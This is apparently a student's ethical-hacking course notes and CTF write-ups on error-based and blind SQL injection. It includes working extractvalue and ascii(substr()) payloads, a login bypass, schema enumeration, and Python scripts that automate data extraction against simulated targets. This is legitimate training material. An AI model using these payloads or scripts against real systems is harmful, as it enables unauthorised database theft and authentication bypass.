Tuesday, May 27, 2025

Segfault ethical hacking week 7

 

Error Based SQL Injection

1) If the SQL query results are displayed directly on the screen → Union SQLi

2) If an error message is output → Error-Based SQLi
        : use the error message itself to carry data out of the database. Two kinds of error have to be told apart:
            (1) Syntax error
            (2) Logic (runtime) error

1) Syntax Error vs. Logic Error

  • Parsing: before a query runs, the DBMS parses and compiles it.
  • Syntax Error: if the query does not parse, nothing executes, so no SELECT result is ever produced.
  • SQL Syntax Error: generally useless for extracting data; it only confirms that the input reaches the query (i.e. the injection point).
  • Data Extraction: a SELECT subquery must actually run, and its result must end up inside the error text.

2) Logic Error

  • Logic (runtime) Error: the query parses and runs, but a function is then handed a value it cannot process and the server raises an error that quotes that value. This is what Error-Based SQLi exploits.
  • Error Message Injection: the goal is to make the quoted value be the result of an attacker-chosen SELECT.

Tips for Inducing Logic Errors

  • Which function will quote attacker data in its error depends on the DBMS and version (extractvalue below is MySQL-specific), so identify the backend first and test the function against it.

Extractvalue Function (MySQL)

extractvalue(xml_fragment, xpath_expression)

Example injection:

___' and extractvalue('1', concat(0x3a, (select '____'))) and '1'='1

  • Replace ____ with the desired SELECT statement; the server answers with an error of the form XPATH syntax error: ':result'.
  • The second argument must begin with a character that is not valid XPath (here ':', i.e. 0x3a) so that parsing fails and the error quotes the whole expression, data included.

Concat Function

  • Usage: joins strings together.
  • concat('hello', 'test') → hellotest
  • concat(0x3a, 'test') → :test

  • Hexadecimal Representation: 0x3a is the hex literal for : (colon); writing it in hex avoids another quoted string literal inside the payload.

Extractvalue Function Characteristics

  • Requires a leading special character like : so that the XPath parser fails and the error echoes the data.
  • The quoted expression is cut off at 32 characters (31 of data after the ':'), so longer values have to be fetched in slices with substr().

This method takes advantage of error messages to extract sensitive information from the database by carefully crafting SQL queries.


Error-Based SQL Injection Steps

  1. Identify the SQL injection point
     • Check whether SQL errors are displayed on the screen.
  2. Pick an error-output function
     • Use extractvalue to trigger an error that carries data.
  3. Construct the attack format

     ___' and extractvalue('1', concat(0x3a, (select '____'))) and '1'='1

     Insert the desired query in place of ____ to retrieve data. The subquery must return a single row and column, so add limit N,1 when it could return several.
  4. Retrieve the database name

     select database()

  5. Retrieve table names (limit 0,1 is the first table, limit 1,1 the second, and so on)

     select table_name from information_schema.tables where table_schema = '_________' limit 1,1

  6. Retrieve column names

     select column_name from information_schema.columns where table_name='____'

  7. Retrieve the name column from the game table

     select name from game limit 0,1



Blind SQL Injection

  1. If SQL query results are displayed on the screen → Union SQLi
  2. If an error message is shown → Error-Based SQLi
  3. Otherwise → Blind SQLi
  • Used where the query result itself is never shown, e.g. a login page or an ID duplication check that only answers yes/no.
  • Extracts data one character at a time by observing the difference between the true and false responses.




Blind SQLi Process

1. Identify SQL Injection Point

  • Test by inserting AND conditions:

normaltic' and '1'='1    → True (normal response)
normaltic' and '1'='2    → False (different response)

  • Verify if the response changes based on true/false conditions.

2. Check if SELECT Statements Can Be Used

normaltic' and ('1'='1') and '1'='1
normaltic' and ((select 'test')='test') and '1'='1

  • If the second payload still behaves as True, subqueries (SELECT) are not filtered.

3. Construct Attack Format

        _____' and (substr((__SQL__), 1, 1) = 'a') and '1'='1

  • substr() extracts characters from a string:
      substr('test', 1, 1) → 't'
      substr('test', 1, 2) → 'te'

  • Compare by ASCII code rather than by character: MySQL's default collations are case-insensitive, so 'a' = 'A' would be true and the case of the result would be lost.
      ascii('a') → 97
      ascii(substr((__SQL__), 1, 1)) > 0

  • Example format:
      _____' and (ascii(substr((__SQL__), 1, 1)) > 0) and '1'='1

  • Printable ASCII runs from 32 to 126. Testing each value in turn costs up to ~95 requests per character; a binary search over the > comparison costs 7. When ascii() returns 0 the position is past the end of the string.
  • Use Burp Suite's Repeater to verify each step by hand, and a script to automate the full extraction.

4. Extract Database Name

    select database()

5. Retrieve Table Names

    select table_name from information_schema.tables where table_schema = '_________'

6. Retrieve Column Names

    select column_name from information_schema.columns where table_name='____'

7. Extract the name column from the game table

    select name from game limit 0,1



Error Based SQLi CTF


1. Find the SQLi point

Check if SQL errors are displayed on the screen.

2. Error-based output function

Use: extractvalue

3. Create the attack format

Example injection:

normaltic' and extractvalue('1', concat(0x3a, (select 'normaltic'))) and '1'='1

4. Extract the Database Name

Use:

select database()

Injection:

normaltic' and extractvalue('1', concat(0x3a, (select database()))) and '1'='1

Assume the database name is: errSqli

5. Get Table Names

Query:

select table_name from information_schema.tables where table_schema = 'errSqli'

Injection:

normaltic' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'errSqli' limit 1,1))) and '1'='1

Results by offset:

  • limit 0,1 → flagTable
  • limit 1,1 → member
  • limit 2,1 → plusFlag_Table

6. Get Column Names

Query:

select column_name from information_schema.columns where table_name='flagTable' limit 0,1

Injection:

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flagTable' limit 0,1))) and '1'='1

Results by offset:

  • limit 0,1 → idx
  • limit 1,1 → flag

7. Extract values from the flagTable, column flag

Query:

select flag from flagTable limit 0, 1

Injection:

normaltic' and extractvalue('1', concat(0x3a, (select flag from flagTable limit 0, 1))) and '1'='1
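As an added example (my code, not the course's or the page author's) covering the Error-Based steps above and this CTF walkthrough: a small Python helper that builds the page's extractvalue payload, parses the leaked value back out of MySQL's "XPATH syntax error" text, and fetches long values in 31-character substr() slices because the error quotes at most 32 characters. The target is a constructed stand-in (an in-memory SQLite table seeded with the 33-character flag from the blind CTF on this page, plus a function that prints the error MySQL would), so the only real-target parts are the payload builder and the parser; the field names id/pw and the requests call in the comment are assumptions. The same helper applies unchanged to the SQL Injection 3, 4 and 5 records further down.

```python
import re
import sqlite3

# Constructed stand-in for the CTF database (not the real target): one table,
# seeded with the 33-character flag from the blind CTF on this page.
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE flagTable (idx INTEGER PRIMARY KEY, flag TEXT);
    INSERT INTO flagTable (flag) VALUES ('segfault{Congratz_firstBlindSqli}');
""")

# MySQL quotes at most 32 characters of the bad XPath expression, and the first
# one is the 0x3a ':' marker, so 31 characters of data survive per request.
CHUNK = 31


def build_payload(inner_sql, offset=1, chunk=CHUNK):
    """The page's template, with the subquery wrapped in substr() so that long
    values are fetched in slices instead of being silently truncated."""
    return (f"normaltic' and extractvalue('1', concat(0x3a, "
            f"substr(({inner_sql}), {offset}, {chunk}))) and '1'='1")


XPATH_ERR = re.compile(r"XPATH syntax error: ':(.*?)'", re.S)


def parse_xpath_error(body):
    """Return the leaked slice from a response body, or None if the body holds
    no extractvalue error (wrong input, or the subquery returned NULL)."""
    m = XPATH_ERR.search(body)
    return m.group(1) if m else None


def extract_via_error(inner_sql, send, chunk=CHUNK):
    """Keep requesting, advancing the substr() offset, until a slice shorter
    than `chunk` comes back. None means the subquery produced no value."""
    value = ""
    while True:
        piece = parse_xpath_error(send(build_payload(inner_sql, len(value) + 1, chunk)))
        if piece is None:
            return value or None
        value += piece
        if len(piece) < chunk:
            return value


# Constructed target (simulation only): pulls the injected expression out of the
# input the way the app's string-built query would evaluate it, runs it against
# SQLite, and returns the error text MySQL's extractvalue would produce.
_INJECTED = re.compile(r"concat\(0x3a, (.*)\)\) and '1'='1$", re.S)


def fake_target(user_input):
    m = _INJECTED.search(user_input)
    if not m:
        return "<html>login failed</html>"
    leaked = DB.execute(f"SELECT {m.group(1)}").fetchone()[0]
    if leaked is None:  # concat(0x3a, NULL) is NULL: extractvalue returns NULL, no error
        return "<html>login failed</html>"
    return f"XPATH syntax error: '{(':' + leaked)[:32]}'"


if __name__ == "__main__":
    # Against a real target, send would be an HTTP call; the field names are assumed:
    #   send = lambda p: requests.post(URL, data={"id": p, "pw": "x"}).text
    print(extract_via_error("select flag from flagTable limit 0,1", fake_target))
```

Without the substr() wrapper the first request would already return the flag cut to 31 characters with no sign that anything is missing, which is the failure mode the 32-character limit produces on long values; stepping the offset until a short slice arrives is the check that catches it.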





Blind SQLi CTF


1. Find the SQL Injection Point

  • normaltic' and '1'='1   → True

  • normaltic' and '1'='2   → False

2. Check if SELECT statements are usable

  • Injection:

normaltic' and ((select 'test')='test') and '1'='1

3. Create the Blind SQLi Attack Format

  • Injection to check whether the ASCII value of the first character of a string is greater than 70 (here the first character is 'n', 110, so the page must behave as True):

normaltic' and (ascii(substr((select 'normaltic'), 1, 1)) > 70) and '1'='1

4. Extract Database Name

  • Query:

select database()
  • Injection format:

normaltic' and (ascii(substr((select database()), 1, 1)) > 0) and '1'='1

Retrieved characters (one position per request, ascii → char):

  1. 98 → b
  2. 108 → l
  3. 105 → i
  4. 110 → n
  5. 100 → d
  6. 83 → S
  7. 113 → q
  8. 108 → l
  9. 105 → i
  10. 0 → end (past the last character substr() is empty and ascii('') is 0, so every > test is false)

Database name is blindSqli

5. Extract Table Name

  • Query:

select table_name from information_schema.tables where table_schema = 'blindSqli'
  • Injection format:

normaltic' and (ascii(substr((select table_name from information_schema.tables where table_schema = 'blindSqli' limit 0, 1), 1, 1)) > 0) and '1'='1

Retrieved characters:

  1. 102 → f
  2. 108 → l
  3. 97 → a
  4. 103 → g
  5. 84 → T
  6. 97 → a
  7. 98 → b
  8. 108 → l
  9. 101 → e
  10. 0 → end

Table name is flagTable

6. Extract Column Names

  • Query:

select column_name from information_schema.columns where table_name='flagTable'
  • Injection format:

normaltic' and (ascii(substr((select column_name from information_schema.columns where table_name='flagTable' limit 0, 1), 1, 1)) > 0) and '1'='1

limit 0,1 → idx

  1. 105 → i
  2. 100 → d
  3. 120 → x
  4. 0 → end

limit 1,1 → flag

  1. 102 → f
  2. 108 → l
  3. 97 → a
  4. 103 → g
  5. 0 → end

Column names are idx and flag

7. Extract Data from flag Column in flagTable

  • Query:

select flag from flagTable limit 0, 1
  • Injection format:

normaltic' and (ascii(substr((select flag from flagTable limit 0, 1), 1, 1)) > 0) and '1'='1

Retrieved characters:

  1. 115 → s
  2. 101 → e
  3. 103 → g
  4. 102 → f
  5. 97 → a
  6. 117 → u
  7. 108 → l
  8. 116 → t
  9. 123 → {
  10. 67 → C
  11. 111 → o
  12. 110 → n
  13. 103 → g
  14. 114 → r
  15. 97 → a
  16. 116 → t
  17. 122 → z
  18. 95 → _
  19. 102 → f
  20. 105 → i
  21. 114 → r
  22. 115 → s
  23. 116 → t
  24. 66 → B
  25. 108 → l
  26. 105 → i
  27. 110 → n
  28. 100 → d
  29. 83 → S
  30. 113 → q
  31. 108 → l
  32. 105 → i
  33. 125 → }
  34. 0 → end

flag is segfault{Congratz_firstBlindSqli}
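As an added example (my code, not the course's or the page author's) covering the Blind SQLi Process above and this walkthrough: a Python extractor for the ascii(substr(...)) > N oracle that binary-searches each character over 0..127 (7 requests per position instead of trying every value), stops when ascii() comes back as 0, and reports how many requests it made. The oracle is a constructed stand-in for an ID duplication check that only answers taken/available: an in-memory SQLite database with a member table holding the user normaltic (the password value is made up) and a flagTable seeded with the flag above. Because SQLite spells MySQL's ascii() as unicode(), the simulator rewrites that one name; everything else is the page's payload verbatim. Its parameterised twin safe_dup_check shows the same payload failing once the input is bound instead of concatenated.

```python
import sqlite3

# Constructed stand-in for the CTF database (not the real target).
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE member (id TEXT, pw TEXT);
    INSERT INTO member VALUES ('normaltic', 'constructed-password');
    CREATE TABLE flagTable (idx INTEGER PRIMARY KEY, flag TEXT);
    INSERT INTO flagTable (flag) VALUES ('segfault{Congratz_firstBlindSqli}');
""")


def build_payload(inner_sql, pos, threshold):
    """The page's template: true iff ascii(character `pos` of the subquery result)
    is greater than `threshold`. ascii() rather than = 'a' because MySQL's default
    collations compare strings case-insensitively, which would lose the case."""
    return (f"normaltic' and (ascii(substr(({inner_sql}), {pos}, 1)) > {threshold}) "
            f"and '1'='1")


def extract_via_blind(inner_sql, oracle, max_len=128):
    """Binary-search each character over 0..127 (7 oracle calls per position)
    instead of trying 33..127 one by one. Past the end of the value, substr()
    yields '' and ascii('') is 0, so every '> n' test is false and lo stays 0.
    Returns (value, number_of_requests)."""
    value, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if oracle(build_payload(inner_sql, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        value += chr(lo)
    return value, requests


# Constructed target: an "is this ID already taken?" check that only answers yes/no.
def fake_dup_check(user_input):
    # The bug: the user-controlled string is pasted straight into the SQL text.
    query = f"SELECT count(*) FROM member WHERE id = '{user_input}'"
    # Dialect shim for the simulation only: SQLite spells MySQL's ascii() as unicode().
    query = query.replace("ascii(", "unicode(")
    return DB.execute(query).fetchone()[0] > 0


def safe_dup_check(user_input):
    # The fix: a bound parameter, so the whole payload is compared as a literal ID.
    row = DB.execute("SELECT count(*) FROM member WHERE id = ?", (user_input,)).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    # With a real target the oracle is an HTTP call that returns True when the
    # "ID taken" response comes back; the field name is assumed:
    #   oracle = lambda p: "already taken" in requests.post(URL, data={"id": p}).text
    flag, n = extract_via_blind("select flag from flagTable limit 0,1", fake_dup_check)
    print(flag, "in", n, "requests")
```

The 33-character flag plus the terminating position costs 34 × 7 = 238 requests; walking 33..127 one value at a time, as the page suggests, would cost up to 95 per character. Against a real target the oracle should also be checked for noise (re-send the same payload twice before trusting a flip), since any response difference unrelated to the condition corrupts the whole string.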

 

SQL Injection 3



1. Error based SQLi check

    1) normaltic' and '1'='1' # / 1234 → login success (the trailing # comments out the rest of the query, so the password is never checked)

    2) Find DB Name
    normaltic' and extractvalue('1', concat(0x3a, (select database()))) and '1'='1
        DB name : sqli_2


    3) Find Table Name
    normaltic' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'sqli_2' limit 0,1))) and '1'='1
    Table name : flag_table




    4) Find Column name
    
normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 0,1))) and '1'='1
    Column name : flag



    5) Extract the flag
normaltic' and extractvalue('1', concat(0x3a, (select flag from flag_table limit 0, 1))) and '1'='1
   



SQL Injection 4


1. Error based SQLi check

    1) normaltic' and '1'='1' # / 1234 → login success



    2) Find DB Name
    normaltic' and extractvalue('1', concat(0x3a, (select database()))) and '1'='1
        DB name : sqli_2_1


    3) Find Table Name
    normaltic' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'sqli_2_1' limit 0,1))) and '1'='1
    Table name : flag_table




    4) Find Column name
    
normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 0,1))) and '1'='1
    Column name : flag1


normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 1,1))) and '1'='1
    Column name : flag2

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 2,1))) and '1'='1
    Column name : flag3


normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 3,1))) and '1'='1
    Column name : flag4

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 4,1))) and '1'='1
    Column name : flag5



normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 5,1))) and '1'='1
    Column name : flag6

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 6,1))) and '1'='1
    Column name : flag7

normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flag_table' limit 7,1))) and '1'='1
    Column name : flag8


    5) Extract each column in turn (or all eight in one request with concat(flag1, flag2, flag3, flag4, flag5, flag6, flag7, flag8), fetched in substr() slices because the error quotes at most 32 characters); the final flag is the eight pieces joined in order.
normaltic' and extractvalue('1', concat(0x3a, (select flag1 from flag_table limit 0, 1))) and '1'='1
   

normaltic' and extractvalue('1', concat(0x3a, (select flag2 from flag_table limit 0, 1))) and '1'='1


normaltic' and extractvalue('1', concat(0x3a, (select flag3 from flag_table limit 0, 1))) and '1'='1


normaltic' and extractvalue('1', concat(0x3a, (select flag4 from flag_table limit 0, 1))) and '1'='1


normaltic' and extractvalue('1', concat(0x3a, (select flag5 from flag_table limit 0, 1))) and '1'='1


normaltic' and extractvalue('1', concat(0x3a, (select flag6 from flag_table limit 0, 1))) and '1'='1


normaltic' and extractvalue('1', concat(0x3a, (select flag7 from flag_table limit 0, 1))) and '1'='1


normaltic' and extractvalue('1', concat(0x3a, (select flag8 from flag_table limit 0, 1))) and '1'='1


flag : segfault{1you_must_concat_this_string_goodjob}



SQL Injection 5




1. Error based SQLi check

    1) normaltic' and '1'='1' # / 1234 → login success



    2) Find DB Name
    normaltic' and extractvalue('1', concat(0x3a, (select database()))) and '1'='1
        DB name : sqli_2_2




    3) Find Table Name
    normaltic' and extractvalue('1', concat(0x3a, (select table_name from information_schema.tables where table_schema = 'sqli_2_2' limit 0,1))) and '1'='1
    Table name : flagTable_this


    4) Find Column name
    
normaltic' and extractvalue('1', concat(0x3a, (select column_name from information_schema.columns where table_name='flagTable_this' limit 0,1))) and '1'='1
    Column name :
        0, 1 = idx
        1, 1 = flag


5)
normaltic' and extractvalue('1', concat(0x3a, (select flag from flagTable_this limit 0, 1))) and '1'='1

The table holds 14 rows: step the offset from limit 0,1 up to limit 13,1 and join the pieces in order (group_concat(flag) would return all rows as one value, to be pulled out in substr() slices).

normaltic' and extractvalue('1', concat(0x3a, (select flag from flagTable_this limit 13, 1))) and '1'='1


flag : segfault{manyData_youFind}




SQL Injection 5





1. Error based SQLi check

    1) normaltic' and '1'='1' # / 1234 → login success


2) Find DB Name
    normaltic' and extractvalue('1', concat(0x3a, (select database()))) and '1'='1
        


I cannot use error-based SQLi.

I need to switch to blind SQLi.


